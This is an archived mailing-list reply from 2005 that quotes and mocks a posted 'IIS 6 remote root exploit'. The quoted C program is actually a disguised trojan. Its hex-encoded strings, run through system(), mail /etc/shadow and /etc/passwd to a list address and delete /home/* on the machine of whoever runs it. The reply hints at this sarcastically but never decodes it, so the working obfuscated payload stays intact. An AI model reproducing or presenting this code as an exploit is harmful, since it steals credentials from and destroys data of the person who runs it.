lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue Apr 19 02:14:17 2005
From: info16 at ifrance.com (Pbt)
Subject: IIS 6 Remote Buffer Overflow Exploit

Le lundi 18 avril 2005 ? 16:53 -0700, Day Jay a ?crit :
> /* Proof of concept code
>    Please don't send us e-mails
>    asking us "how to hack" because
>    we will be forced to skullfsck you.
> 
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
You're right to add this warning ! :)

>   
>    Remote root.
> 
>    eg.
>    #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>     + Connecting to host...
>     + Connected.
>     + Inserting Shellcode...
>     + Done...
>     + Spawining shell..
> 
>     Microsoft Windows XP [Version 5.1.2600]
>    (C) Copyright 1985-2001 Microsoft Corp.
>    C:\>
> 
> 
> 
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
> 
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> 
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
Strange sc... :)

> main()
> {
> 
> //Section Initialises designs implemented by mexicans
> //Imigrate


> system(launcher);
> system(netcat_shell);
> system(shellcode);
Very stealth, awesome !!


> //int socket = 0;
> //double long port = 0.0;
> 
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
> 
>  //     for(int j; j < 30; j++)
>         {
>         //Find socket remote address fault
>         printf(".");
Did you forget to add a printf("Waiting for your root shell...\n");
here, huh ?

>         }
> //overtake inetinfo here IIS_666666^
> return 0;
> }

OK Great work !
Don't forget to send us your tcp stack remote r00t h4x0r 0day
tomorrow :)

-- 
Pbt
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050419/32f93dab/attachment.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ